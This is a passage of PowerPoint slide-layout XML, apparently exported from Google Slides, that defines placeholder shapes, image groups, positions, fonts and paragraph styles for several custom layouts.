            <a:off x="4648200" y="6203952"/>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06"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8375904" y="6203952"/>
            <a:ext cx="3276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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Google Shape;23;p106"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-2" y="-10825"/>
            <a:ext cx="12192003" cy="6515395"/>
            <a:chOff x="-1" y="-10825"/>
            <a:chExt cx="9144002" cy="6515395"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Google Shape;24;p106"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="-10825"/>
              <a:ext cx="3429000" cy="3181546"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Google Shape;25;p106"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1295401" y="-10825"/>
              <a:ext cx="7848600" cy="3522243"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Google Shape;26;p106"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831825" y="2232482"/>
              <a:ext cx="1282976" cy="1108588"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="Google Shape;27;p106"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="2962082"/>
              <a:ext cx="2757625" cy="3542488"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="Google Shape;28;p106"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId6">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2" y="2313169"/>
              <a:ext cx="2259131" cy="2895506"/>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showMasterSp="0">
  <p:cSld name="Custom Layout">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="29" name="Shape 29"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Google Shape;30;p107"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6807200" y="3143"/>
            <a:ext cx="5384802" cy="1101851"/>
            <a:chOff x="5334000" y="-37306"/>
            <a:chExt cx="3281716" cy="895350"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="Google Shape;31;p107"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5448301" y="-37306"/>
              <a:ext cx="3167415" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Google Shape;32;p107"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334000" y="-37306"/>
              <a:ext cx="819150" cy="895350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;33;p107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521208" y="448056"/>
            <a:ext cx="6876288" cy="64008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107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="6203952"/>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07"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8375904" y="6203952"/>
            <a:ext cx="3276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6" name="Google Shape;36;p107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1425655"/>
            <a:ext cx="10302240" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-228600" lvl="1" marL="914400" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-228600" lvl="2" marL="1371600" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-228600" lvl="3" marL="1828800" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-228600" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-342900" lvl="5" marL="2743200" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-342900" lvl="6" marL="3200400" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-342900" lvl="7" marL="3657600" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-228600" lvl="8" marL="4114800" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1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7" name="Shape 37"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Google Shape;38;p108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256032" y="265176"/>
            <a:ext cx="11683049" cy="6332433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F5F5F5"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Google Shape;39;p108"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604434" y="1196392"/>
            <a:ext cx="10983132" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="25400">
            <a:solidFill>
              <a:srgbClr val="D24726"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;40;p108"/>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3A3838"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="3A383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108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="1435608"/>
            <a:ext cx="4416552" cy="3977640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-304800" lvl="1" marL="914400" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-304800" lvl="2" marL="1371600" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-304800" lvl="3" marL="1828800" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-304800" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-342900" lvl="5" marL="2743200" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-342900" lvl="6" marL="3200400" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-342900" lvl="7" marL="3657600" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-228600" lvl="8" marL="4114800" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Google Shape;42;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="6203952"/>
            <a:ext cx="3276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200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>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08"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="6203952"/>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200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>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08"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8371926" y="6203952"/>
            <a:ext cx="3276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595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="0" lvl="5" marL="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="0" lvl="6" marL="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="0" lvl="7" marL="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="0" lvl="8" marL="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>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5" name="Shape 45"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Google Shape;46;p109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254950" y="262784"/>
            <a:ext cx="11682101" cy="6332433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D24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47" name="Google Shape;47;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521208" y="448056"/>
            <a:ext cx="6876288" cy="64008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8" name="Shape 48"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Google Shape;49;p110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254951" y="262784"/>
            <a:ext cx="11683049" cy="6332433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F5F5F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50" name="Google Shape;50;p110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254950" y="262784"/>
            <a:ext cx="11682101" cy="2072643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D247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51" name="Google Shape;51;p110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521208" y="1536192"/>
            <a:ext cx="6876288" cy="64008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3600"/>
              <a:buFont typeface="Quattrocento Sans"/>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110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="2560320"/>
            <a:ext cx="9445752" cy="3977640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-304800" lvl="1" marL="914400" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-304800" lvl="2" marL="1371600" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
